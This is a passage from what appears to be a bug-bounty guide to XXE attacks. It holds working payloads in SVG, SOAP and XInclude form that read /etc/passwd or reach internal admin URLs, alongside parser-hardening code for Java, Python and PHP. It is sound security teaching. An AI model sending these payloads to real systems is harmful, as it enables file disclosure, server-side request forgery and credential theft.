  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg">
  <text x="20" y="35" font-size="16">&xxe;</text>
</svg>
Many image processing libraries parse SVG as XML, making them vulnerable to XXE.
SOAP endpoints
Some REST APIs maintain legacy SOAP support. Try switching to SOAP format:
POST /api/users HTTP/1.1
Host: example.com
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE soap:Envelope [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUserInfo>&xxe;</getUserInfo>
  </soap:Body>
</soap:Envelope>
XInclude attacks when DOCTYPE is restricted
Some applications implement protections that prevent you from controlling the DOCTYPE declaration entirely – for example, by stripping it from user input or using XML parsers configured to reject custom DOCTYPEs. In these cases, XInclude attacks provide an alternative exploitation path.
XInclude is an XML feature that allows the inclusion of external XML documents or resources without requiring DOCTYPE declarations. If the application’s XML parser has XInclude processing enabled (most parsers require this to be switched on explicitly, but some applications and frameworks do so), you can bypass DOCTYPE-based defences like so:
<data xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/passwd" parse="text"/>
</data>
The parse="text" attribute is crucial, as it tells the parser to treat the included content as plaintext rather than XML, preventing parsing errors when reading files that aren’t valid XML (like /etc/passwd).
For remote file inclusion or SSRF via XInclude:
<data xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="http://internal.company.com/admin"/>
</data>
XInclude attacks are particularly effective against applications that sanitise or validate XML input before processing, since they don’t rely on DOCTYPE declarations that trigger many security filters.
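To see what XInclude processing does once an application opts in, the sketch below uses Python’s standard-library xml.etree.ElementInclude on a document with an xi:include element and no DOCTYPE at all. A temporary file stands in for the sensitive target so the example is self-contained, and note that this particular module takes a plain file path in href rather than a file:// URI. It is an illustration of the mechanism, not a claim about how any specific target is configured.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

# Stand-in for a sensitive file, so the example does not touch real data.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
    handle.write("secret-value\n")
    secret_path = handle.name

document = (
    '<data xmlns:xi="http://www.w3.org/2001/XInclude">'
    f'<xi:include href="{secret_path}" parse="text"/>'
    "</data>"
)

root = ET.fromstring(document)
before = root.text              # parsing alone leaves xi:include untouched
ElementInclude.include(root)    # explicit opt-in: resolve xi:include elements
after = root.text               # the file contents have replaced the element

os.unlink(secret_path)
print(repr(before), repr(after))
```

The parse step on its own does nothing with the include; the file is only read once the application calls the XInclude processor, which is why this vector depends on how the target wires up its parser.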
XXE prevention and mitigation best practices
How can developers protect against XXE attacks? Several proven strategies can eliminate or significantly reduce the risk.
The gold standard is disabling external entity processing entirely at the parser level. This configuration varies by language and XML library but should always be your primary defence.
Java (DocumentBuilderFactory):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
Python (using defusedxml):
from defusedxml import ElementTree as ET
tree = ET.parse('untrusted.xml')  # Safe by default
PHP (libxml):
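// libxml_disable_entity_loader() is deprecated since PHP 8.0, where external entity loading is already off by default
libxml_disable_entity_loader(true);
// Avoid LIBXML_NOENT and LIBXML_DTDLOAD: they turn entity substitution and DTD loading back on
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);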
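Where adding a dependency such as defusedxml is not an option, a similar "no DOCTYPE at all" policy can be approximated with Python’s standard library alone. The sketch below runs a first pass with expat that aborts as soon as a DOCTYPE declaration starts, and only then hands the document to ElementTree. The names parse_untrusted and DoctypeForbidden are made up for this example, and the double parse trades a little performance for simplicity.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML only if it declares no DOCTYPE (and therefore no entities)."""

    def forbid(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = forbid
    checker.Parse(data, True)     # raises DoctypeForbidden or expat.ExpatError
    return ET.fromstring(data)    # only reached for DOCTYPE-free documents


print(parse_untrusted(b"<a>ok</a>").text)
```

Rejecting the DOCTYPE outright mirrors the disallow-doctype-decl feature in the Java example: without a DTD there is nowhere to declare an entity, internal or external.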
Input validation should implement strict allowlists rather than blocklists. Architectural decisions matter too. When possible, avoid XML altogether; JSON has become the standard for APIs and doesn’t suffer from XXE vulnerabilities. If XML is required for specific use cases, use it only for trusted internal communications and stick to simpler formats like JSON for user input.
Finally, implement defense in depth: network segmentation limits SSRF impact, least-privilege IAM policies reduce credential theft damage, and proper error handling prevents information disclosure even when parsers misbehave.
Conclusion
XXE vulnerabilities remain a serious threat to modern applications, despite growing awareness and improved framework defaults. The complexity of XML processing, legacy system requirements and developer misconfigurations ensure that XXE continues to surface regularly in Bug Bounty Programs.
What makes XXE particularly valuable for hunters is its versatility – ranging from straightforward file disclosure to complex SSRF attacks that expose cloud credentials or internal infrastructure. A single XXE vulnerability can provide the initial foothold for demonstrating severe security impact.
The techniques in this guide give you a practical framework for XXE testing. Remember that demonstrating impact is particularly crucial for justifying your severity assessment: reading /etc/passwd proves the vulnerability, but extracting AWS credentials or accessing internal admin panels demonstrates real-world risk!
As you hunt for XXE, expand your testing beyond obvious XML endpoints. Check file upload features for XML-based formats like DOCX and XLSX using tools like XXElixir, probe APIs for legacy SOAP support and Content-Type switching vulnerabilities, test document processing systems with canarytokens to identify command-line parsers, and always try encoding variations when facing filters.
XXE hunting requires patience and creativity, but the combination of technical depth and significant real-world impact makes XXE a rewarding vulnerability class for Bug Bounty hunters.
Happy hunting! o/



